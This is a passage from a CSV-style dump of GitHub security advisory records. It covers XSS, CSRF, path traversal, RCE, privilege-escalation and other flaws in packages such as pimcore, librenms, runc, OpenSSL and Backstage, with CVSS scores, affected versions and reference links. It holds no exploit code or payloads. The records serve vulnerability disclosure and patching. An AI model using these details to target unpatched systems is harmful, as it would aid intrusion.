'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4084'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/3c2a14e676a57e5d77a16255965988eef48f9065'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/dcb37f19-ba53-4498-b953-d21999279266'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T14:44:34Z', 'nvd_published_at': '2021-12-10T12:15:00Z'}" +1.4.0,GHSA-rp42-c45j-g46x,2021-12-16T14:09:16Z,2021-12-16T14:12:23Z,,['CVE-2021-4107'],yetiforcecrm is vulnerable to Cross-site Scripting,yetiforcecrm is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yetiforce/yetiforce-crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4107'}, {'type': 'WEB', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm/commit/a062d3d5fecb000db207a2ad8a446db97ad96b89'}, {'type': 'PACKAGE', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1d124520-cf29-4539-a0f3-6d041af7b5a8'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-15T15:17:18Z', 'nvd_published_at': '2021-12-14T15:15:00Z'}" +1.4.0,GHSA-7fr2-94h7-ccg2,2022-01-04T18:58:33Z,2021-12-17T20:41:33Z,,['CVE-2020-35209'],An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.,An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.atomix:atomix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35209'}, {'type': 'WEB', 'url': 'https://docs.google.com/presentation/d/1W5KU7ffh4dheR8iD54ulABImi6byAhSI-OhEKw2adRo/edit?usp=sharing'}, {'type': 'PACKAGE', 'url': 'https://github.com/atomix/atomix'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T18:40:51Z', 'nvd_published_at': '2021-12-16T20:15:00Z'}" +1.4.0,GHSA-rrm8-32g4-w8m3,2021-05-12T18:30:22Z,2021-12-20T18:04:46Z,,['CVE-2017-1000069'],Cross-site Request Forgery (CSRF),CSRF in Bitly oauth2_proxy 2.1 during authentication flow,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/bitly/oauth2_proxy'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000069'}, {'type': 'WEB', 'url': 'https://github.com/bitly/oauth2_proxy/pull/360'}, {'type': 'WEB', 'url': 'https://github.com/bitly/oauth2_proxy/commit/55085d9697962668fd4e43e8e4644144fe83cd93'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000069'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T18:30:22Z', 'nvd_published_at': None}" +1.4.0,GHSA-vrc7-6g8w-jh56,2022-03-11T22:59:06Z,2021-12-09T19:29:36Z,,['CVE-2015-9544'],Improper Input Validation in xdLocalStorage,An issue was discovered in xdLocalStorage through 2.0.5. The receiveMessage() function in xdLocalStoragePostMessageApi.js does not implement any validation of the origin of web messages. Remote attackers who can entice a user to load a malicious site can exploit this issue to impact the confidentiality and integrity of data in the local storage of the vulnerable site via malicious web messages.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'xdlocalstorage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-9544'}, {'type': 'WEB', 'url': 'https://github.com/ofirdagan/cross-domain-local-storage/issues/17'}, {'type': 'WEB', 'url': 'https://github.com/ofirdagan/cross-domain-local-storage/pull/19'}, {'type': 'WEB', 'url': 'https://github.com/ofirdagan/cross-domain-local-storage'}, {'type': 'WEB', 'url': 'https://grimhacker.com/exploiting-xdlocalstorage-localstorage-and-postmessage/#Missing-Origin-Magic-iframe'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T16:20:26Z', 'nvd_published_at': '2020-04-07T18:15:00Z'}" +1.4.0,GHSA-3m3h-v9hv-9j4h,2021-11-24T20:01:39Z,2021-12-02T17:49:40Z,,['CVE-2021-25986'],Cross-site Scripting in django-wiki,"In Django-wiki, versions 0.0.20 to 0.7.8 are vulnerable to Stored Cross-Site Scripting (XSS) in Notifications Section. An attacker who has access to edit pages can inject JavaScript payload in the title field. When a victim gets a notification regarding the changes made in the application, the payload in the notification panel renders and loads external JavaScript.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.20'}, {'fixed': '0.7.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25986'}, {'type': 'WEB', 'url': 'https://github.com/django-wiki/django-wiki/pull/1148'}, {'type': 'WEB', 'url': 'https://github.com/django-wiki/django-wiki/commit/9eaccc7519e4206a4d2f22640882f0737b2da9c5'}, {'type': 'PACKAGE', 'url': 'https://github.com/django-wiki/django-wiki'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25986'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:01:39Z', 'nvd_published_at': '2021-11-23T20:15:00Z'}" +1.4.0,GHSA-7289-chwj-7h86,2021-12-06T22:05:08Z,2021-12-10T20:18:30Z,,['CVE-2021-44278'],Path traversal in librenms/librenms,Librenms 21.11.0 is affected by a path manipulation vulnerability in includes/html/pages/device/showconfig.inc.php.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '21.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44278'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/pull/13554'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T22:05:08Z', 'nvd_published_at': '2021-12-03T13:15:00Z'}" +1.4.0,GHSA-wc7v-77jr-5c3m,2021-12-03T15:35:34Z,2021-12-03T20:38:37Z,,['CVE-2021-3944'],bookstack is vulnerable to Cross-Site Request Forgery (CSRF),bookstack is vulnerable to Cross-Site Request Forgery (CSRF),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ssddanbrown/bookstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3944'}, {'type': 'WEB', 'url': 'https://github.com/bookstackapp/bookstack/commit/88e6f93abf54192a69cc8080e0dc6516ee68ccbb'}, {'type': 'PACKAGE', 'url': 'https://github.com/bookstackapp/bookstack'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/65551490-5ade-49aa-8b8d-274c2ca9fdc9'}]","{'cwe_ids': ['CWE-352'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-12-03T15:35:34Z', 'nvd_published_at': '2021-12-02T17:15:00Z'}" +1.4.0,GHSA-hwqf-gcqm-7353,2021-06-30T17:38:02Z,2021-12-10T18:56:57Z,,['CVE-2021-23400'],Header injection in nodemailer,The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodemailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23400'}, {'type': 'WEB', 'url': 'https://github.com/nodemailer/nodemailer/issues/1289'}, {'type': 'WEB', 'url': 'https://github.com/nodemailer/nodemailer/commit/7e02648cc8cd863f5085bad3cd09087bccf84b9f'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314737'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEMAILER-1296415'}]","{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:38:02Z', 'nvd_published_at': '2021-06-29T12:15:00Z'}" +1.4.0,GHSA-2g8g-63j4-9w3r,2021-11-29T19:39:57Z,2021-12-01T18:29:12Z,,[],RCE vulnerability affecting v1beta3 templates in @backstage/plugin-scaffolder-backend,"The templating library used by the scaffolder backend assumes that templates are trusted which is an undesired property of the scaffolder-backend. This has now been mitigated by sandboxing the template code execution. + +### Impact +A malicious actor with write access to a registered scaffolder template could manipulate the template in a way that allows for remote code execution on the scaffolder-backend instance. This was only exploitable in the template yaml definition itself and not by user input data. + +### Patches +This is vulnerability is patched in version `0.15.14` of `@backstage/plugin-scaffolder-backend`. + + +### For more information +If you have any questions or comments about this advisory: + +* Open an issue in the [Backstage repository](https://github.com/backstage/backstage) +* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)",[],"[{'package': {'ecosystem': 'npm', 'name': '@backstage/plugin-scaffolder-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-2g8g-63j4-9w3r'}, {'type': 'PACKAGE', 'url': 'https://github.com/backstage/backstage'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T19:39:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-5m6c-jp6f-2vcv,2021-05-24T20:58:18Z,2021-12-20T17:58:59Z,,['CVE-2020-4037'],Open Redirect in OAuth2 Proxy,"### Impact +As users can provide a redirect address for the proxy to send the authenticated user to at the end of the authentication flow. This is expected to be the original URL that the user was trying to access. +This redirect URL is checked within the proxy and validated before redirecting the user to prevent malicious actors providing redirects to potentially harmful sites.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/oauth2-proxy/oauth2-proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.1'}, {'fixed': '6.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-5m6c-jp6f-2vcv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-4037'}, {'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/commit/ee5662e0f5001d76ec76562bb605abbd07c266a2'}, {'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/releases/tag/v6.0.0'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T20:58:18Z', 'nvd_published_at': None}" +1.4.0,GHSA-fwh7-v4gf-xv7w,2022-01-03T15:55:40Z,2021-12-16T21:00:45Z,,['CVE-2021-4116'],yetiforcecrm is vulnerable to Cross-site Scripting,yetiforcecrm is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yetiforce/yetiforce-crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4116'}, {'type': 'WEB', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm/commit/9cdb012ca64ff1f719f8120d5fd162cd5ef1013f'}, {'type': 'PACKAGE', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7561bae7-9053-4dc8-aa59-b71acfb1712c'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T15:40:11Z', 'nvd_published_at': '2021-12-15T14:15:00Z'}" +1.4.0,GHSA-4jhc-wjr3-pwh2,2022-01-04T18:59:32Z,2021-12-17T20:40:38Z,,['CVE-2020-35211'],An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node.,An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node in a target cluster via manipulation of the variable terms in RaftContext.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.atomix:atomix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35211'}, {'type': 'WEB', 'url': 'https://docs.google.com/presentation/d/1C_IpRfSU-9FMezcHCFZ-qg-15JO-W36yvqcnzI8sQs8/edit?usp=sharing'}, {'type': 'PACKAGE', 'url': 'https://github.com/atomix/atomix'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T18:48:40Z', 'nvd_published_at': '2021-12-16T20:15:00Z'}" +1.4.0,GHSA-mmjf-f5jw-w72q,2022-09-19T21:58:21Z,2021-12-15T00:00:42Z,,['CVE-2021-4044'],Invalid handling of `X509_verify_cert()` internal errors in libssl,"Internally libssl in OpenSSL calls X509_verify_cert() on the client side to verify a certificate supplied by a server. That function may return a negative return value to indicate an internal error (for example out of memory). Such a negative return value is mishandled by OpenSSL and will cause an IO function (such as SSL_connect() or SSL_do_handshake()) to not indicate success and a subsequent call to SSL_get_error() to return the value SSL_ERROR_WANT_RETRY_VERIFY. This return value is only supposed to be returned by OpenSSL if the application has previously called SSL_CTX_set_cert_verify_callback(). Since most applications do not do this the SSL_ERROR_WANT_RETRY_VERIFY return value from SSL_get_error() will be totally unexpected and applications may not behave correctly as a result. The exact behaviour will depend on the application but it could result in crashes, infinite loops or other similar incorrect responses. This issue is made more serious in combination with a separate bug in OpenSSL 3.0 that will cause X509_verify_cert() to indicate an internal error when processing a certificate chain. This will occur where a certificate does not include the Subject Alternative Name extension but where a Certificate Authority has enforced name constraints. This issue can occur even with valid chains. By combining the two issues an attacker could induce incorrect, application dependent behaviour. Fixed in OpenSSL 3.0.1 (Affected 3.0.0).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4044'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=758754966791c537ea95241438454aa86f91f256'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0129.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211229-0003/'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20211214.txt'}]","{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2022-06-17T00:01:23Z', 'nvd_published_at': '2021-12-14T19:15:00Z'}" +1.4.0,GHSA-3h68-wvv6-8r5h,2021-07-28T18:09:42Z,2021-12-10T17:20:11Z,,['CVE-2020-1940'],Improper Removal of Sensitive Information Before Storage or Transfer in Apache Jackrabbit Oak,"The optional initial password change and password expiration features present in Apache Jackrabbit Oak 1.2.0 to 1.22.0 are prone to a sensitive information disclosure vulnerability. The code mandates the changed password to be passed as an additional attribute to the credentials object but does not remove it upon processing during the first phase of the authentication. In combination with additional, independent authentication mechanisms, this may lead to the new password being disclosed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jackrabbit:oak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.24.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.22.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jackrabbit:oak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1940'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3da8e2fd253ecd4d3a0de71ce255631148b54be8500225b5812f7737@%3Coak-commits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r45b0e2fb6ac51c5a03952b08b5e0efde1249ecb809884cc87eb0bd99@%3Ccommits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r601637e38ee743e845856a4e24915cb8db26ae80ca782bef91989cbc@%3Coak-commits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra295f919586b19def7cc7713d9d78595507d5f703362fccb779eeeb9@%3Coak-commits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra6b3e78f5ed545c1d859d664f66c6d3fc5d731d9b1d842349654e4f0@%3Ccommits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb3023cfd45441b570c1abaa347d0cac78df97b5d3f27d674d01b3d2a@%3Ccommits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba884dbe733781cbaaffa28b77bc37a6a9f948b3a72a1bdad5e1587c@%3Ccommits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbef4701b5ce4d827182e70ad7b4d987a9157682ba3643e05a9ef5a7b@%3Ccommits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc35a57ecdeae342d46f729d6bc9750ba860c101f450cc171798dba28@%3Coak-commits.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rccc0ed467faa35734ea16b8f5de5603e708936c41a4eddd90fddeaf0%40%3Cusers.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rccc0ed467faa35734ea16b8f5de5603e708936c41a4eddd90fddeaf0@%3Cannounce.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/01/28/1'}]","{'cwe_ids': ['CWE-200', 'CWE-212'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:04:32Z', 'nvd_published_at': '2020-01-28T17:15:00Z'}" +1.4.0,GHSA-q3j5-32m5-58c2,2021-10-05T16:34:17Z,2021-12-20T18:21:34Z,,['CVE-2016-3697'],Privilege Elevation in runc,"libcontainer/user/user.go in runC before 0.1.0, as used in Docker before 1.11.2, improperly treats a numeric UID as a potential username, which allows local users to gain privileges via a numeric username in the password file in a container.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/runc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-3697'}, {'type': 'WEB', 'url': 'https://github.com/docker/docker/issues/21436'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/pull/708'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/69af385de62ea68e2e608335cffbb0f4aa3db091'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencontainers/runc'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/releases/tag/v0.1.0'}, {'type': 'WEB', 'url': 'https://lists.opensuse.org/opensuse-updates/2016-05/msg00111.html'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0070'}, {'type': 'WEB', 'url': 'https://rhn.redhat.com/errata/RHSA-2016-1034.html'}, {'type': 'WEB', 'url': 'https://rhn.redhat.com/errata/RHSA-2016-2634.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201612-28'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2016-1034.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2016-2634.html'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T18:53:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-hg2p-2cvq-4ppv,2023-09-05T22:42:28Z,2021-12-10T20:06:23Z,,['CVE-2020-7642'],Cross-site scripting in lazysizes,"lazysizes through 5.2.0 allows execution of malicious JavaScript. The following attributes are not sanitized by the video-embed plugin: `data-vimeo`, `data-vimeoparams`, `data-youtube` and `data-ytparams` which can be abused to inject malicious JavaScript.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'lazysizes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7642'}, {'type': 'WEB', 'url': 'https://github.com/aFarkas/lazysizes/commit/3720ab8262552d4e063a38d8492f9490a231fd48'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LAZYSIZES-567144'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:08:07Z', 'nvd_published_at': '2020-04-22T16:15:00Z'}" +1.4.0,GHSA-v39h-qm32-8gwq,2021-07-29T15:53:05Z,2021-12-09T19:57:29Z,,['CVE-2020-7616'],Improperly Controlled Modification of Dynamically-Determined Object Attributes in express-mock-middleware,"express-mock-middleware through 0.0.6 is vulnerable to Prototype Pollution. Exported functions by the package can be tricked into adding or modifying properties of the `Object.prototype`. Exploitation of this vulnerability requires creation of a new directory where an attack code can be placed which will then be exported by `express-mock-middleware`. As such, this is considered to be a low risk.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'express-mock-middleware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7616'}, {'type': 'WEB', 'url': 'https://github.com/LingyuCoder/express-mock-middleware/blob/master/lib/index.js#L39'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-EXPRESSMOCKMIDDLEWARE-564120'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T17:28:15Z', 'nvd_published_at': '2020-04-07T14:15:00Z'}" +1.4.0,GHSA-4jwx-78vx-gm6g,2021-12-14T15:29:58Z,2021-12-10T20:34:01Z,,['CVE-2021-4033'],Cross-Site Request Forgery in kimai2,CSRF in saving invoices / modifying status of invoices (pending and cancel only),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4033'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/1da26e041df62c10bd8075d78f2db7854d3eee07'}, {'type': 'PACKAGE', 'url': 'https://github.com/kevinpapst/kimai2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e05be1f7-d00c-4cfd-9390-ccd9d1c737b7'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-10T20:05:32Z', 'nvd_published_at': '2021-12-09T20:15:00Z'}" +1.4.0,GHSA-j5qg-w9jg-3wg3,2021-12-16T15:47:47Z,2021-12-16T18:53:57Z,,[],Inability to de-op players if listed in ops.txt with non-lowercase letters,"### Impact +Originally reported in iTXTech/Genisys#1188 + +```txt +PotterHarry98 +potterharry98 +``` + +`deop PotterHarry98` + +will remove `potterharry98` from the ops.txt but not `PotterHarry98`. + +Operator permissions are checked using `Config->exists()` with `lowercase=true`, which will result in a match: +https://github.com/pmmp/PocketMine-MP/blob/22bb1ce8e03dba57173debf0415390511d68e045/src/utils/Config.php#L449 + +This means that it's possible to make yourself impossible to de-op (using commands) by adding your name to ops.txt with uppercase letters. + +### Patches +4d37b79ff7f9d9452e988387f97919a9a1c4954e + +### Workarounds +This can be easily addressed by removing the offending lines from ops.txt manually. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [pmmp/PocketMine-MP](https://github.com/pmmp/PocketMine-MP) +* Email us at [team@pmmp.io](mailto:team@pmmp.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-j5qg-w9jg-3wg3'}, {'type': 'WEB', 'url': 'https://github.com/iTXTech/Genisys/issues/1188'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/commit/4d37b79ff7f9d9452e988387f97919a9a1c4954e'}, {'type': 'PACKAGE', 'url': 'https://github.com/pmmp/PocketMine-MP'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/blob/4.0.3/changelogs/4.0.md#403'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T15:47:47Z', 